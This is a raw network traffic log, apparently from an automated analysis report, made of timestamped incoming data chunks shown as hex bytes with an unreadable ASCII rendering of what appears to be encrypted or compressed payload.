                                                                          2023-11-21 16:58:41 UTC510INData Raw: 5f 36 ef 2a e4 75 26 30 93 72 91 14 d8 26 a3 27 57 b6 f0 2b a6 49 69 64 08 09 a9 c2 de 31 ca 11 6e ea 3c c9 1e bb 93 9a 38 49 0a 3a e0 20 ce 92 7d 1e 12 a6 0c 16 99 74 58 d4 1c b0 21 9e ed 27 9c 64 41 3e 1f a6 73 eb 25 91 dc 2e f2 05 f3 30 c6 b9 9f ad 06 93 28 da e0 7d 51 26 72 c3 6a 16 0f cd 11 13 dc 3e 8d f3 83 82 e1 10 2e d3 86 6e 85 73 f2 ba 42 97 e4 c3 5d 82 cc 4c f0 be c1 39 32 42 8f f3 b6 8b f2 e5 04 9f 23 fa 35 0c 78 6a 93 4b eb e9 ed 2d 2c 41 4d ce 2b dd a4 41 2e fb 3d ab 05 1e d9 1a 2f 22 41 78 b9 56 50 8d 1e 2b d7 8e 2e 2d cb 1e 3b 59 18 f0 8c c5 bf fd 51 cb cb 12 ef 6b 7d be 38 83 92 b2 2e 15 db 80 ef 13 23 79 d9 bd 12 ce 8c a8 e6 46 0e 43 cb f3 73 28 a8 c8 b3 cb 98 cc 1a 9e 1e 06 0f 05 3c 39 fa 1c 02 f1 5b 4a 56 a5 80 2e c5 d9 cb 06 bf f0 f7
                                                                          Data Ascii: _6*u&0r&'W+Iid1n<8I: }tX!'dA>s%.0(}Q&rj>.nsB]L92B#5xjK-,AM+A.=/"AxVP+.-;YQk}8.#yFCs(<9[JV.
                                                                          2023-11-21 16:58:41 UTC512INData Raw: c2 d3 ac 0a 41 e8 18 3f e1 86 7b 72 82 0f 0d 80 84 87 aa 17 37 9f b6 ca da d8 f8 1c dc 03 5b 8d 99 77 3f a6 9d d9 b1 ea 67 e6 8d 35 33 d6 0b e9 75 f9 ec fb 3d 1b df c8 be b8 1f e7 cb 86 91 2e d5 7a 98 11 f9 e0 e6 cf af bb c1 72 08 b2 f2 d1 b5 1b bd a6 36 6c a5 8c 09 1c a5 5d 54 44 bd c1 80 ca be 7b 83 69 0f fc 54 36 58 ed 48 4e b1 17 34 22 3d f9 c9 55 12 48 e1 ff a3 1b 82 7f 02 d1 f5 d2 d5 1d 3b d3 3a a2 c4 12 e4 1a 09 56 ec 99 4c 9f 69 fb f0 09 55 5d 48 96 d2 ed 13 61 60 78 10 16 5e cd 0e 98 ab 2a 49 c3 7c e9 49 87 23 9e 9c fc 45 58 cc 84 b9 44 96 aa 33 77 fb 83 fc 6c 01 e1 61 fe 3a 42 09 08 27 58 b4 fa 30 d2 12 1b ea 6d b0 3d b5 75 22 5a e6 e9 c6 94 b7 df f8 9b 94 3f d9 b4 fc e0 bc 9a a1 3a 98 fc 70 8e b4 7b a5 13 5b d0 7f af 52 c8 f8 a2 47 9f b3 42 b1
                                                                          Data Ascii: A?{r7[w?g53u=.zr6l]TD{iT6XHN4"=UH;:VLiU]Ha`x^*I|I#EXD3wla:B'X0m=u"Z?:p{[RGB
                                                                          2023-11-21 16:58:41 UTC513INData Raw: 0f 7b 58 fe 08 ca 25 4d 36 61 9f fb 82 de d1 7b c3 13 85 c0 cd 26 ca 5d e7 7d 0a 3d bb 83 6e 53 b5 4f 8b ec 52 db a8 3c 84 5a c5 b5 7a 06 95 c7 40 d8 cc 99 a4 34 92 fb 89 a3 47 a9 fd 48 2d 57 b4 e5 ca 24 25 c0 ba 25 8f f3 99 d8 62 66 b7 49 d0 44 d9 5c 23 69 52 a1 79 e2 1c 12 16 9b 7d b7 3d 41 bf 39 3d 0f 2b dc 02 66 83 17 a5 5f af aa 5f da a1 78 57 47 81 4f 8a 8a e9 86 8f 17 f1 16 8f 85 c2 3c a5 09 90 a9 9a 0e a4 04 b2 98 93 e0 4d ff 39 fb a9 de 4e e9 a2 57 90 d5 22 ed 3f eb 53 b0 88 60 55 44 e1 9f 72 70 74 4b 6c c5 50 4c b8 2f ba 5d e4 79 0f 0e 03 35 73 aa 76 b3 92 a4 43 69 9f 3a 9c ad 20 99 ba 1b e4 41 8d 92 b5 9c 48 9b 72 df 9f 08 2a f8 87 84 e1 48 5f db 16 80 6d 55 de 51 0e 5f c1 a2 bb 30 7f f5 69 bf 3c 59 99 4a df 6d ce 6c 18 b0 f1 d3 ca f6 61 8f 55
                                                                          Data Ascii: {X%M6a{&]}=nSOR<Zz@4GH-W$%%bfID\#iRy}=A9=+f__xWGO<M9NW"?S`UDrptKlPL/]y5svCi: AHr*H_mUQ_0i<YJmlaU
                                                                          2023-11-21 16:58:41 UTC514INData Raw: 6d 42 c3 e0 ad 95 ed 0e 3e a1 19 ae 3c f1 ad 8b 83 19 5a 9f 22 5f 0f d2 d1 07 e4 cb bf 97 1f ad 5c 0b f0 f8 49 7b 77 71 9e ab 1d ba dd 93 e6 1c 90 a9 02 e0 f2 31 09 04 4f 56 ba c8 0c c7 e4 2f ed a4 87 c3 19 b6 55 63 61 46 e7 5a 05 5e 16 ff 68 0b aa 36 fe 9a a6 d9 c3 90 ff 3b 88 26 13 70 17 cd 86 12 72 84 15 97 97 b1 9e 5b ae 6e c4 ef 32 29 69 f7 5c e1 6f 1d 88 d0 aa 88 9c bc 7a d1 1d 92 b8 d6 9e 7e ac c1 70 f2 f4 83 e3 af b3 81 f3 00 23 2a f5 c7 ae 7e b7 55 8c 56 f3 ea f0 48 bf bf 31 3c 1e 30 1f 85 cb 75 ee aa 2b 0c 11 d8 81 f1 51 8c 0c fb 4c 82 c0 7c 54 0b d1 3e 07 03 02 55 8f bc a2 ef ce c0 d8 7b 3f 7e 0f 0d c1 d3 aa 6c a9 33 06 33 6f ef 1c 5d 82 89 2b 0a 0b 15 44 0d d1 4e d4 70 85 44 c1 bf e7 d2 ce fd 57 88 66 a1 0f 15 d6 59 ca 96 bc 7f 2f 41 b7 fd 6a
                                                                          Data Ascii: mB><Z"_\I{wq1OV/UcaFZ^h6;&pr[n2)i\oz~p#*~UVH1<0u+QL|T>U{?~l33o]+DNpDWfY/Aj
                                                                          2023-11-21 16:58:41 UTC516INData Raw: 96 75 9f f7 ee b2 17 fb 67 de 91 e5 5c 35 cd 02 3d 03 4a 0b 67 fd b1 79 46 05 36 46 a7 a8 77 d1 e2 14 50 7a ba 3e 98 4f 81 90 e0 c4 f8 4f 0c 62 2a 9a 70 42 80 b5 c3 d4 c7 7d e7 fb 0e 29 e2 9c 40 64 89 00 a7 27 3b 8d 16 55 bc 42 96 1b 7c 65 90 ab e1 ea cf 0a b2 c1 85 ec b8 99 0e b8 6b 70 05 ce 18 c6 1a d0 f2 75 e3 40 00 8c 71 28 44 99 49 7a 5d 5e de f5 d1 50 92 6d 10 28 f9 6c cc 19 9d c2 ae fd 8e 6c e3 32 46 e8 c9 28 c5 97 a9 36 15 71 40 e0 6c 99 b2 b1 08 ee bb d8 a6 5a ee d1 36 f5 a5 5f 34 e3 80 1e f7 65 28 4e 62 8e 52 a7 53 fc 7f ab 67 c0 37 c5 7c f0 bf 02 32 2b 73 64 28 e8 74 fe 74 d2 e3 64 59 9e 6c 30 68 67 5f 41 5b 0c 0a 1b f2 bb d5 a6 6f 16 43 08 3f bb 80 c4 c2 43 e1 8a 39 5a 1e 86 24 1c 4c 29 92 70 de 1e e9 e6 75 e7 a4 fb 4e 75 63 f9 76 aa 50 1c 73
                                                                          Data Ascii: ug\5=JgyF6FwPz>OOb*pB})@d';UB|ekpu@q(DIz]^Pm(ll2F(6q@lZ6_4e(NbRSg7|2+sd(ttdYl0hg_A[oC?C9Z$L)puNucvPs
                                                                          2023-11-21 16:58:41 UTC517INData Raw: 61 5f 23 10 ac b1 67 a1 cb d5 16 fe f7 96 32 9b 76 8b 53 89 5e 74 07 42 4b 00 82 15 3a 9c 32 37 ae 6d f4 d8 0a b1 55 bf 79 13 86 c4 92 32 e1 1c ed b7 6f 5e 38 3f ce e4 c0 4f e4 77 87 64 44 68 51 e6 24 d8 8c fb 05 87 20 dc 1f 71 1c 0e f7 dd 35 30 84 f7 33 de 80 86 a0 65 e9 dd bb e3 51 54 0b 15 43 4e 04 c7 e6 a8 f1 47 2a 27 96 7d 8a 8d 05 0f 6f 26 20 47 a3 ab e7 35 e8 1a 22 1a c4 94 0f 27 9d 29 7f 58 34 90 1c 23 f8 8c b0 30 2c a3 28 5d 69 a9 05 47 cf 4d 32 ce 99 73 e0 98 c9 98 74 9c 82 f3 ff 8d aa 4c 49 59 a9 82 db 79 af 90 ab fa c7 2f f7 70 7b 5a ad 1f b9 ea d5 a2 4a 4c 95 54 6a 7c e5 09 14 67 d6 89 17 42 8b d7 32 43 8f 4d ce b0 70 d6 0a 3f 63 16 39 aa 01 7b 5f f8 69 9d 61 99 3c 16 fa 73 04 70 e5 6c b4 44 95 91 19 19 91 fe 8c 51 86 19 d1 fe 16 2d 6a 48 5a
                                                                          Data Ascii: a_#g2vS^tBK:27mUy2o^8?OwdDhQ$ q503eQTCNG*'}o& G5"')X4#0,(]iGM2stLIYy/p{ZJLTj|gB2CMp?c9{_ia<splDQ-jHZ
                                                                          2023-11-21 16:58:41 UTC518INData Raw: 35 e0 62 b9 dd 59 83 66 a1 e1 3e 90 f5 49 6c 54 d0 07 cc 8d d2 4b 89 ec 98 83 68 ab 33 83 f1 e2 99 6f a7 61 bc 4f 94 38 a7 15 45 88 a0 e1 02 5c 4c ee 50 d4 75 36 6e 2d 39 58 38 94 cb 18 6d bb 5b a6 56 1f 1d a2 cd 49 52 25 19 28 42 77 49 bb 92 d9 ba 6d 0c b7 9f 72 d1 8c 46 96 84 d5 78 1e f2 55 47 51 b0 1d f4 bb bb eb 8c 54 a9 57 47 fc d8 df 22 81 e0 9c e6 b5 e8 d4 ac 5c af 5b 66 73 ce 8b 83 54 02 ce db e0 b7 9c 9c 1a 80 0d 44 a7 4d 2b 0f 61 07 47 70 04 a7 08 b4 ac 3f 07 3b 27 13 25 11 ef e0 90 78 3f bd 24 4a 00 28 54 d4 5a 7c 5b 93 56 2b 23 59 7a af 9a ea f1 86 e7 12 3b 07 8a 62 ab 74 5f 14 dd 52 c3 b9 2e a7 aa a6 85 02 80 c2 bd 16 51 aa 55 92 1c cd 5b 23 19 29 65 59 ed 52 60 4f 90 9d c8 64 04 09 ac c4 99 74 28 ed b7 65 58 69 70 12 7a 15 79 df 2e 4b ea e4
                                                                          Data Ascii: 5bYf>IlTKh3oaO8E\LPu6n-9X8m[VIR%(BwImrFxUGQTWG"\[fsTDM+aGp?;'%x?$J(TZ|[V+#Yz;bt_R.QU[#)eYR`Odt(eXipzy.K
                                                                          2023-11-21 16:58:41 UTC520INData Raw: 62 f3 40 4c 2f 54 cf 64 d1 bd 46 9a c2 fd 56 c9 80 0b 2c cc 44 bc 9d 59 03 d4 ea 71 ca 00 2e 97 df 7f b5 14 db 67 0e 6b a8 de b3 47 a9 9c 31 ca 90 8c 4b 34 fd 0b 82 7a 83 fd 1c 00 3e e7 5a 18 16 ad f6 3e 47 43 1c 8b 34 ab 53 92 93 04 e2 c7 1d 7e 8b 65 48 83 2d ce 5f 22 78 fc a7 14 d9 42 7b 0c 3a 97 6c d1 6a c3 11 8f 66 e6 39 07 52 5a 65 94 10 0a 4b 73 31 c1 64 16 c4 70 a5 23 c5 08 0e 85 76 23 fd 48 37 d9 49 0e a0 07 ba 91 7e 23 be 05 19 a1 28 27 77 64 d5 45 3f 3e e9 4a af af 8f 99 3b db 32 ea 13 91 c6 3d 8e 32 5a 82 e8 71 f4 20 19 d2 0f ea e3 46 8e 53 24 95 92 32 6b 62 77 62 bc ef 35 2f b3 ac 94 50 0b e9 b7 30 2d ad c3 a7 b0 1d ce fe d3 94 8f b8 49 dc ad 56 d7 ef db 6f 61 90 e5 9b b1 44 28 08 48 9b 4c 74 91 89 c8 7f 9f 9b fb cd 8b 0d 22 80 c6 e3 df ec 8c
                                                                          Data Ascii: b@L/TdFV,DYq.gkG1K4z>Z>GC4S~eH-_"xB{:ljf9RZeKs1dp#v#H7I~#('wdE?>J;2=2Zq FS$2kbwb5/P0-IVoaD(HLt"
                                                                          2023-11-21 16:58:41 UTC521INData Raw: a1 21 9c 23 24 2b 26 92 03 e7 a1 90 91 10 94 35 a1 b7 8a 54 e7 a9 cd 4c 61 e6 87 12 eb aa 32 df 87 59 b9 b5 43 20 e8 a8 13 c4 0b fe 93 7b 78 d6 d9 e3 ed 75 02 df 05 a1 50 67 72 10 64 9e 0f d7 27 f8 96 b9 98 9e 34 f0 44 4b 9d 7e e7 8e 30 5c 15 2e bc 73 f7 02 55 37 d1 9f 4c 8f 2a 0e 54 25 a7 e0 1c 4a dc ac 64 d5 b9 f3 b5 af f3 34 d7 ee 26 6b b1 da a4 c4 37 61 38 13 ca 6d 9e 92 e2 b4 e5 df bc 70 d8 61 e0 63 6b 4e 4c b4 e3 6e 16 6b f6 a7 35 7e 7c dd d0 c8 d2 72 4d fc 1c ff 0c 8d fc a6 a8 96 3b 56 d4 9b 1d 98 38 e5 74 ff 89 13 28 d1 fe cb da c8 8d 84 77 2f 7c 3e a0 01 b0 5e 32 be 86 3e 41 ef 43 68 cd f8 1b 17 76 eb 3d 5b a3 0e a4 6a 50 72 41 5d 02 09 ec 02 40 dc 32 32 2c 0c 4b 67 18 38 45 91 96 97 4b 29 d7 46 1c a7 8f 4e 0c 6d 62 94 28 82 5c f9 f8 e3 18 0c ea
                                                                          Data Ascii: !#$+&5TLa2YC {xuPgrd'4DK~0\.sU7L*T%Jd4&k7a8mpackNLnk5~|rM;V8t(w/|>^2>AChv=[jPrA]@22,Kg8EK)FNmb(\
                                                                          2023-11-21 16:58:41 UTC522INData Raw: 76 9c 8c b9 0a 33 80 88 0b b1 ee 81 a4 f7 5f d4 a0 6c e8 56 21 4f f0 f5 ab 87 9b 57 2d da 86 0a 7e 3e 4b 4c ad af ff 9e 05 6e e9 68 37 09 12 d1 bb 5a b5 a5 24 39 d1 52 04 73 54 26 e5 46 6f c6 3e de fa e7 da 7f 38 21 ae 83 0b 5f ce 15 b7 89 7d e7 f8 b6 be 5c 3b e8 2a 47 ae 38 62 fe ab f6 00 76 5f 76 52 ce 4c ee a4 9f 7b 70 42 5c 40 2d 8c c3 b5 d0 b5 44 62 22 45 6b 6e bc c0 35 63 36 81 5d 30 a6 05 73 a9 c4 2c 61 8c f6 2a 09 c3 f8 bb 00 e0 8b 5c 96 cd b3 f3 ba 6a da 09 02 09 29 cc bd b3 00 43 f5 00 e7 0f 68 a9 22 30 26 d1 d0 ca bc 1e 53 91 6b 36 0b 12 7c 02 e9 0a f4 2f 34 c0 b1 b8 59 fc 5b c8 32 19 a1 c1 86 0b d4 ac 8d ef 3d 20 00 9d 32 d3 06 bc 79 db 25 0a dc 45 ce 4c eb ae 03 3c 94 31 ce 20 50 b2 4b 66 a9 49 ca 06 a9 dc e1 4b 06 18 84 5e 35 4a 48 7e de a6
                                                                          Data Ascii: v3_lV!OW-~>KLnh7Z$9RsT&Fo>8!_}\;*G8bv_vRL{pB\@-Db"Ekn5c6]0s,a*\j)Ch"0&Sk6|/4Y[2= 2y%EL<1 PKfIK^5JH~
                                                                          2023-11-21 16:58:41 UTC524INData Raw: e9 85 e0 10 08 b1 0a 21 4c 55 85 4a ac 0c 4e 95 26 a4 c3 37 56 a4 45 e5 64 a4 b9 36 57 fb a2 36 9f 68 ab 01 56 93 1f 6e 0f 12 37 8b b9 27 37 73 fb 48 a5 9d 7b b9 12 e7 2f 87 c1 3f 3c d5 e6 65 31 68 6b de 9f 7f 6d 37 df 64 31 df 09 81 9d d8 47 a0 f0 2c ca 81 a0 ae a5 35 76 53 89 0b bc 44 f6 13 59 ec 80 c8 d5 16 57 72 44 d7 8c 6c 47 76 ea f6 f2 d6 52 c4 bc 17 db 7d 0f 52 be 16 88 ae 87 fb 9e 4b 5e f1 10 f1 a8 d6 4c e6 8c 89 45 a9 62 5f 56 5d 94 7b ea 99 7e d0 ae 8d 5b 6b 0c 65 ad 9d 1a f5 35 3f 1f 30 87 25 29 4b 87 2b 88 0f 76 15 67 81 db f6 b8 05 8c fb d6 b4 09 db 71 5d e5 15 e8 63 b5 68 22 51 52 12 f1 18 45 06 aa 4a 15 49 d2 cf 6b 9b b6 e1 a3 b7 b3 b6 73 f1 f5 d0 e1 08 57 f5 19 86 b6 65 56 86 d5 d9 4c 6f 2a 2b 87 d0 c4 68 9a 5d 84 b5 6d 99 05 cb a4 af 76
                                                                          Data Ascii: !LUJN&7VEd6W6hVn7'7sH{/?<e1hkm7d1G,5vSDYWrDlGvR}RK^LEb_V]{~[ke5?0%)K+vgq]ch"QREJIksWeVLo*+h]mv
                                                                          2023-11-21 16:58:41 UTC525INData Raw: 69 28 88 b3 d3 56 5d c9 18 65 ec 9a a6 3f 29 3b 70 2c 2d e0 3a 34 3e b9 b7 22 5d f3 fb 2c 0d ec f5 ac f5 85 c1 82 52 bf 37 9d a5 82 90 c2 68 56 72 70 61 a9 a0 f3 5b 8c a0 b4 30 d8 f8 ac e8 37 3b ef 16 5c 98 5c e5 8c ae 2f 39 93 46 63 d4 00 ad b0 ba 51 a5 6a d0 54 b6 8e 29 9e 53 5a 1b 52 f6 7b 44 61 44 d1 da 96 e9 d4 da 05 ea f9 0f 93 59 c0 cb 6b 9c bc d0 da fb 1c 13 33 13 22 ab 1e d3 d0 b7 09 a3 0c 73 4d 20 b6 11 8d c4 2c 8a e0 c9 b5 f6 f8 a8 bd db 68 93 7e 2c 01 bb fe 90 da 8c dd 2b 92 f6 6b 4f 04 94 48 f3 2e 42 0d d1 1a fb 7a 5e f3 ab be f4 75 6c 14 51 13 48 2b 91 dc 41 f0 f3 e0 cc 34 52 56 13 96 a2 5b 12 db da 93 cd de dc fb b1 28 2e 13 12 1c eb 2e 98 b6 74 25 41 cd e5 3f 47 48 dc 9f 53 ec 5e 18 fa c9 c2 77 d0 a2 a8 32 fe 0a ed 12 c6 c2 a8 56 85 fe c8
                                                                          Data Ascii: i(V]e?);p,-:4>"],R7hVrpa[07;\\/9FcQjT)SZR{DaDYk3"sM ,h~,+kOH.Bz^ulQH+A4RV[(..t%A?GHS^w2V
                                                                          2023-11-21 16:58:41 UTC526INData Raw: 97 9b 2f f0 ed 82 cb 96 8c 28 ec bd eb c7 58 bf 16 13 47 79 cf 89 31 d3 6e ed 0e ae 72 84 dd db 54 b2 40 cf b9 9e 7a 97 7c 21 c3 a5 91 98 52 c3 d5 66 c3 64 84 fa 4f fe 43 2d 80 c6 7b a5 dc 16 72 96 84 19 64 5d 56 56 d3 f7 9a b8 f7 76 4d 73 73 9b c5 da 2c b6 48 40 ce b0 5d 7d 3c b7 25 51 7f 5d 89 e6 a7 f3 42 f0 b0 af e3 87 fd 9a 03 82 83 00 d9 f8 d2 2d 81 63 0b 7b 19 45 35 ba e2 14 02 61 c7 34 73 62 3e dc bb d3 81 f9 46 2d 75 cb c4 b4 63 a5 ea 97 e8 bd 3d 8d 27 64 b1 d2 fe f7 ef 65 b3 d0 33 66 f5 ec cd 59 31 90 31 d0 df d3 b0 ef 53 99 7c db 99 e9 7d 52 ca bd 6c 3f 59 13 bb 61 37 b2 f8 d4 1d ea 97 5c b2 85 c8 bb 1f e1 91 ad ee ad ec 0a 5d 34 ea 40 16 47 33 69 29 f0 db 46 ab 71 11 8f 35 d1 a2 fb 2c d3 df a6 00 30 1c ff b2 8c 5a ac e2 82 ed c2 0b 08 a1 bb 39
                                                                          Data Ascii: /(XGy1nrT@z|!RfdOC-{rd]VVvMss,H@]}<%Q]B-c{E5a4sb>F-uc='de3fY11S|}Rl?Ya7\]4@G3i)Fq5,0Z9
                                                                          2023-11-21 16:58:41 UTC528INData Raw: e0 fa 29 23 64 a9 29 32 76 e4 b3 50 dc 18 8e 16 91 ae be d3 c5 ba 57 d2 c6 25 35 3b 71 71 fa bc 9c c0 e4 c6 80 f0 48 c5 99 b3 54 4f ba 39 37 30 a9 16 5b 1b 3a 83 f3 a6 e4 66 7b b3 dc f4 9f 89 ca 17 7a 4e 79 e2 b6 4d 49 14 05 66 5e c9 3c 57 43 34 91 24 e1 33 c0 84 73 17 dd c8 e3 fc 5b 04 a2 a0 ad 83 66 e8 97 96 21 d2 46 ab 41 b8 30 e8 d4 bc d3 24 94 cc c3 5d 15 43 a6 83 96 38 19 21 72 cb 97 24 c0 48 f5 d1 4b 67 ec 7f f6 c7 25 91 f0 e3 fd ac 70 a2 44 e8 d0 bb d8 a5 c1 21 2f 33 11 fb cc 5e 31 e1 27 10 9f de d3 7f f8 2b 65 b8 bb 8b d6 27 3d e2 8c d6 cb 3f 1c 7c 62 47 57 a6 99 a0 3c 74 44 c5 b8 c3 aa d5 46 ed 1b b0 97 d3 19 46 ff 0c d7 86 aa 18 76 bc c6 01 15 84 47 82 cf 36 ad 32 89 87 bb 13 89 a1 99 1b c8 11 d4 40 53 08 7e c5 0f 4b 3f 38 90 3b 03 88 71 b7 e0
                                                                          Data Ascii: )#d)2vPW%5;qqHTO970[:f{zNyMIf^<WC4$3s[f!FA0$]C8!r$HKg%pD!/3^1'+e'=?|bGW<tDFFvG62@S~K?8;q
                                                                          2023-11-21 16:58:41 UTC529INData Raw: 79 02 68 bd fb b3 4e d1 d5 b8 ab 91 eb af 6c c0 22 a1 de c4 8e 35 c7 c9 0a c6 2e af 70 b3 75 92 93 77 d9 76 a7 98 ef dd 6b e4 fe e2 0e b2 a8 2a d5 32 ac 33 b5 d4 43 75 f4 6f cd e8 58 b3 f6 5d df 65 f2 05 99 bc 18 d4 ea 50 56 26 24 04 54 2a 63 dd 7a 1d 01 56 8f 8c a0 b9 9b e8 5a 6e 5c b6 91 5b 37 d6 d5 a7 0f 3c 74 9e 17 c7 3b 7f d2 f9 9d f0 a6 f0 3b 90 49 df c8 29 f7 a4 63 8f c3 7b 33 76 ab 82 40 99 9e 38 f7 22 71 a3 ac 36 a4 be 96 0e 87 b5 bb d1 13 cc c1 a1 fc ff ea d2 ff 02 14 8c 6b 0c fa 29 86 a4 c9 21 dd 95 8f 31 34 85 60 18 cd c4 b2 6b 60 07 c6 a5 ae c5 ef 56 aa b8 35 21 bb 28 1d 49 8c bf 15 da 81 e8 fb e7 2f fc b6 54 9c b8 99 3a 88 b9 29 6b 91 7f f6 9b 30 37 30 67 69 2b 45 a3 61 08 53 5d 8d 60 6f d7 58 a8 18 86 98 c9 2a c0 8c 32 5b 3b 8e 37 49 67 9d
                                                                          Data Ascii: yhNl"5.puwvk*23CuoX]ePV&$T*czVZn\[7<t;;I)c{3v@8"q6k)!14`k`V5!(I/T:)k070gi+EaS]`oX*2[;7Ig
                                                                          2023-11-21 16:58:41 UTC530INData Raw: aa aa 24 de f9 c3 af 7f 51 ba 20 08 88 4d 9d fd 69 e7 7a 7f 46 cb e2 a1 04 1d b7 7c 05 18 aa f4 1f a5 6a b5 54 e0 a3 98 c4 4f ab ab fa 4a 22 3d a8 da 33 c0 2d c4 14 08 4a ef 88 02 72 17 fc b6 46 9c 8c 9d a7 8e 6a d2
                                                                          Data Ascii: $Q MizF|jTOJ"=3-JrFj
                                                                          2023-11-21 16:58:41 UTC530INData Raw: df 64 36 49 ce b1 1a b6 bb e3 88 39 27 cc c5 69 57 77 ad 2f 4b 4e d6 78 43 eb 59 64 0b 99 d7 7f 1f cb ea 9c 4d 05 fa 4e b6 57 ce 9f 79 61 1c 7e 93 25 3b 3a dd ad 80 3f a1 71 cb cd d8 ec d5 f6 14 39 c2 40 32 ba a9 cd 61 34 46 9d e6 96 e6 cc e6 68 89 88 18 75 b4 75 76 4a 71 da d1 36 c7 b9 90 16 30 ca 97 00 1c fa a0 d6 12 80 bd bd 88 1f 42 ed 65 de 49 ed 80 fd 2e 62 0d 81 c6 f3 27 08 fb bf e9 8a bc 55 b7 74 6e de 43 da 2a c2 97 87 b4 b4 0f 94 99 84 c9 a4 d7 e9 33 7c 96 b5 d5 cd 19 ff 9e f6 70 ef 67 18 80 4e 57 6f 50 59 bc d6 bc 8c 74 a9 a2 c2 b7 ad ab 64 46 7a 49 58 61 cb 1c df ae 65 25 15 45 73 94 69 c5 8b 9f 81 16 cb 12 24 1f 8c 47 04 d0 ad bc 92 5b 29 c9 32 fa ef 4f f4 6a b8 da 10 96 f3 6f 59 94 db 69 92 98 ca ca 6c 6f ea 7f 7b 6e de a1 1a df d8 f2 57 af
                                                                          Data Ascii: d6I9'iWw/KNxCYdMNWya~%;:?q9@2a4FhuuvJq60BeI.b'UtnC*3|pgNWoPYtdFzIXae%Esi$G[)2OjoYilo{nW
                                                                          2023-11-21 16:58:41 UTC532INData Raw: b2 30 22 f7 13 28 8f b8 eb 30 85 10 55 41 38 13 d5 70 b0 7f d3 d4 db 7d 6f c6 2b 16 86 c5 47 72 92 d7 96 69 8e ea 0d f6 fc 9b 00 e2 40 da 44 90 00 e2 c6 17 6b e4 7f 37 35 37 3b 36 36 6e 6a bc df 76 ed 1a f0 db 80 4e 5f 9e 47 8f 47 0d 94 79 be 9d 17 bd a8 0c a9 dc 9d 16 1e d8 89 a4 7f 59 88 da 5a 9a ec 46 2d a5 dd 33 49 06 39 2f 5a 7e d1 f4 f5 6c cd f0 22 c4 30 5e 04 6f 1f 8b 1a f3 36 b5 d0 4e 22 0a fd 39 01 4e b9 9b 1d 20 1f d4 6a 00 40 72 65 35 68 94 d2 24 31 b3 0f bf 36 a0 21 74 d2 d1 32 7b 76 9b 63 72 52 3c 39 3a 29 7e c1 53 6a 23 39 2b 98 87 a8 3c e6 9c 02 be b4 47 04 9f 05 7b 59 25 de 63 ce 7f bd 81 cf 44 9b 8d c9 ac 25 0c 4f e2 09 ad bf 88 d7 b2 39 6c 36 87 3c 02 34 34 2a 32 8c f8 66 67 65 66 5e b8 a0 d3 39 6a d5 e9 36 6e 2c 77 c0 2b 3a 70 b4 a9 71
                                                                          Data Ascii: 0"(0UA8p}o+Gri@Dk757;66njvN_GGyYZF-3I9/Z~l"0^o6N"9N j@re5h$16!t2{vcrR<9:)~Sj#9+<G{Y%cD%O9l6<44*2fgef^9j6n,w+:pq
                                                                          2023-11-21 16:58:41 UTC533INData Raw: a2 6a 8c 5e 79 c0 23 2c 7f bd ff aa f8 97 47 f5 28 58 b6 b3 ed a7 92 af 74 37 93 81 2c b9 f0 20 2f 60 c2 38 11 c0 3b 58 e8 6a 10 4a 23 dd ad 43 ad 3a 24 ad 56 bc fd 2c 2c 91 bb 8e 68 40 29 bb c6 37 ff 93 b0 11 83 4b cb 6f 49 58 22 1d ce 6d bc 71 7c cb 2d 8e 0b c2 6c 65 20 3b 91 3a 7c 54 c8 6e 2a 3e fb 26 d7 15 af 53 e7 27 99 ee 62 47 a8 6e 6d 39 0e f4 0c cd c2 e1 49 23 61 26 d7 04 a3 73 68 40 59 c1 68 70 5c aa 75 cb 75 d5 fc d1 22 24 b5 df b0 1d c5 88 4c 82 e3 b7 cd 07 38 a1 c3 aa 2a e6 4f 60 b3 6d 62 b0 46 1b c7 9a 6a 80 4a 3c 19 de 27 47 d0 64 04 4f 96 9f 47 ec df af 0b ba 7f 6d 97 74 00 ea 45 ca ec 8d 6b 2c a4 1b 0f 66 79 37 65 5d 1b 35 a8 47 d4 ea 6b 96 53 d9 d9 fd 06 c3 a8 71 42 95 3d 90 5d b0 bd cc 50 a3 b6 f8 73 ab 26 ca 47 0d 06 bc d2 04 3e 6f 5f
                                                                          Data Ascii: j^y#,G(Xt7, /`8;XjJ#C:$V,,h@)7KoIX"mq|-le ;:|Tn*>&S'bGnm9I#a&sh@Yhp\uu"$L8*O`mbFjJ<'GdOGmtEk,fy7e]5GkSqB=]Ps&G>o_
                                                                          2023-11-21 16:58:41 UTC534INData Raw: 28 de c7 2b e1 c5 39 51 fc 9b 73 06 be 85 54 c0 86 e1 1a be 0c a6 6a 68 08 42 e7 af 7d e0 e9 74 4d 60 d4 c9 04 c5 db c8 c0 9c d7 3e 1e 09 f8 57 2d 87 da da 8e 1d 1d c8 fe 9c a0 c8 56 8d aa d4 8a 84 ea f0 fe 4d cd ea a2 0e 6f b9 0e 6c d9 ff ad 57 25 81 26 34 8c 4e 24 25 67 1b a8 06 35 c8 cf 07 43 87 48 55 a5 a3 53 1a c8 56 81 49 a2 25 3f ad dd a5 12 6e 80 17 c2 7b a6 95 88 01 b5 69 71 1e 65 9d 43 69 63 31 be 32 eb d2 83 1b 42 54 ab 6f 45 0b e2 47 20 a8 39 25 c8 1c fd ff bf b2 d7 c1 36 33 26 19 96 b4 95 5f a7 65 bb 29 37 50 01 38 30 2d cf c9 81 34 24 a8 b5 28 54 51 13 63 c7 f4 e9 d3 64 40 c8 8b 41 64 d9 e4 bb b7 fd 6a 35 35 3b 1b fd b3 5a 95 91 d1 d9 09 12 0b 8d cc a8 c8 ab de 36 76 b3 6f 25 01 25 6e 6f c1 73 40 d5 8e ac e0 93 49 60 82 e2 a6 2d 8a c5 63 65
                                                                          Data Ascii: (+9QsTjhB}tM`>W-VMolW%&4N$%g5CHUSVI%?n{iqeCic12BToEG 9%63&_e)7P80-4$(TQcd@Adj55;Z6vo%%nos@I`-ce
